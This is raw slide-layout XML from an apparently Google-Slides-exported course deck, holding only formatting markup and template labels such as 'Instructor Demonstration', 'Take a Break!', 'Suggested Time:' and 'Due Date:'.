        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2297" name="Google Shape;2297;p148"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10559806" y="3048000"/>
            <a:ext cx="3258038" cy="436866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298"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2299" name="Google Shape;2299;p149"/>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00" name="Google Shape;2300;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-114370" y="-64333"/>
            <a:ext cx="24606390" cy="1384106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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2302" name="Google Shape;2302;p150"/>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03" name="Google Shape;2303;p150"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="24377574" cy="13712428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2304" name="Google Shape;2304;p150"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-67" y="1097067"/>
            <a:ext cx="24377701"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Take a Break!</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2305" name="Google Shape;2305;p150"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146399" y="3916000"/>
            <a:ext cx="12084899"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06"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2307" name="Google Shape;2307;p15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8" name="Google Shape;2308;p15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t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2309" name="Google Shape;2309;p151"/>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2310" name="Google Shape;2310;p151"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5461509" y="1323033"/>
            <a:ext cx="13454633" cy="11067052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="49803"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2312" name="Google Shape;2312;p15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13" name="Google Shape;2313;p152"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-114370" y="-64333"/>
            <a:ext cx="24606390" cy="1384106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27"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="128" name="Google Shape;128;p38"/>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29" name="Google Shape;129;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-19595" y="0"/>
            <a:ext cx="24414299"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130" name="Google Shape;130;p3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38"/>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marR="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="7200"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Instructor Demonstration</a:t>
            </a:r>
            <a:endParaRPr sz="7200" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Google Shape;133;p3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34" name="Google Shape;134;p38"/>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5" name="Google Shape;135;p38"/>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36"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="137" name="Google Shape;137;p39"/>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38" name="Google Shape;138;p3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9" name="Google Shape;139;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="21493494" y="10600400"/>
            <a:ext cx="1462660" cy="1935211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Google Shape;140;p39"/>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1" name="Google Shape;141;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-19595" y="0"/>
            <a:ext cx="24414299"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142" name="Google Shape;142;p39"/>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3" name="Google Shape;143;p3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39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731343" y="10515267"/>
            <a:ext cx="20417099"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Suggested Time:</a:t>
            </a:r>
            <a:endParaRPr sz="3500" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Google Shape;145;p3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6" name="Google Shape;146;p39"/>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47"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="148" name="Google Shape;148;p40"/>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9" name="Google Shape;149;p4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0" name="Google Shape;150;p40"/>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51" name="Google Shape;151;p40"/>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2" name="Google Shape;152;p40"/>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3" name="Google Shape;153;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="3424667"/>
            <a:ext cx="24377701"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p40"/>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55" name="Google Shape;155;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="12377733"/>
            <a:ext cx="24443101"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6" name="Google Shape;156;p4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57"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="158" name="Google Shape;158;p41"/>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59" name="Google Shape;159;p4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 name="Google Shape;160;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="21493494" y="10600400"/>
            <a:ext cx="1462660" cy="1935211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p4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p41"/>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3" name="Google Shape;163;p41"/>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4" name="Google Shape;164;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731343" y="10515267"/>
            <a:ext cx="20417099"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Suggested Time:</a:t>
            </a:r>
            <a:endParaRPr sz="3500" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Google Shape;165;p4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66" name="Google Shape;166;p41"/>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67"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="12377733"/>
            <a:ext cx="24443101"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9" name="Google Shape;169;p4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0" name="Google Shape;170;p42"/>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71" name="Google Shape;171;p42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="3424667"/>
            <a:ext cx="24377701"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72" name="Google Shape;172;p42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>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3" name="Google Shape;173;p42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>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4" name="Google Shape;174;p42"/>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75" name="Google Shape;175;p4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76" name="Google Shape;176;p42"/>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77"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="178" name="Google Shape;178;p43"/>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79" name="Google Shape;179;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-19595" y="0"/>
            <a:ext cx="24414299"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180" name="Google Shape;180;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="209" r="208"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2288388" y="2927000"/>
            <a:ext cx="4631755" cy="5280200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p4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2" name="Google Shape;182;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="21493494" y="10600400"/>
            <a:ext cx="1462660" cy="1935211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Google Shape;183;p4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4" name="Google Shape;184;p43"/>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5" name="Google Shape;185;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731343" y="10515267"/>
            <a:ext cx="20417099"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Due Date:</a:t>
            </a:r>
            <a:endParaRPr sz="3500" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Google Shape;186;p4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7" name="Google Shape;187;p43"/>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88"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="3424667"/>
            <a:ext cx="24377701"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90" name="Google Shape;190;p4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1" name="Google Shape;191;p44"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="192" name="Google Shape;192;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="504" r="503"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="22013117" y="11202333"/>
            <a:ext cx="1462661" cy="1663773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Google Shape;193;p44"/>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4" name="Google Shape;194;p44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>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5" name="Google Shape;195;p44"/>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96" name="Google Shape;196;p44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="12377733"/>
            <a:ext cx="24443101"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7" name="Google Shape;197;p4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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;17;p23"/>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 name="Google Shape;18;p23"/>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 name="Google Shape;19;p23"/>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0" name="Google Shape;20;p2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 name="Google Shape;21;p23"/>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2" name="Google Shape;22;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3" name="Google Shape;23;p23"/>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3"/>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5" name="Google Shape;25;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218833" y="3586941"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Google Shape;26;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01</a:t>
              </a:r>
              <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Google Shape;27;p23"/>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23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8608308" y="3586941"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Google Shape;29;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02</a:t>
              </a:r>
              <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Google Shape;30;p23"/>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 name="Google Shape;31;p23"/>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3"/>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33" name="Google Shape;33;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="16353290" y="3588941"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Google Shape;34;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03</a:t>
              </a:r>
              <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Google Shape;35;p23"/>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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="17065369"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3"/>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98"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Google Shape;199;p4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5"/>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 name="Google Shape;201;p45"/>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2" name="Google Shape;202;p45"/>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03" name="Google Shape;203;p4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4" name="Google Shape;204;p45"/>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05" name="Google Shape;205;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06" name="Google Shape;206;p45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="3676879"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="207" name="Google Shape;207;p45"/>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01</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="208" name="Google Shape;208;p45"/>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45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="5943313"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="210" name="Google Shape;210;p45"/>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02</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="211" name="Google Shape;211;p45"/>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 name="Google Shape;212;p45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="8196979"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="213" name="Google Shape;213;p45"/>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214" name="Google Shape;214;p45"/>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 name="Google Shape;215;p45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="10463379"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="216" name="Google Shape;216;p45"/>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217" name="Google Shape;217;p45"/>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p45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="37280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9" name="Google Shape;219;p4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4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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="59561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 name="Google Shape;223;p45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="82033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4" name="Google Shape;224;p45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="104505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25"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;226;p4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6"/>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8" name="Google Shape;228;p46"/>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29" name="Google Shape;229;p46"/>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30" name="Google Shape;230;p4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31" name="Google Shape;231;p46"/>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32" name="Google Shape;232;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33" name="Google Shape;233;p46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="3467313"/>
            <a:ext cx="2071187" cy="1656821"/>
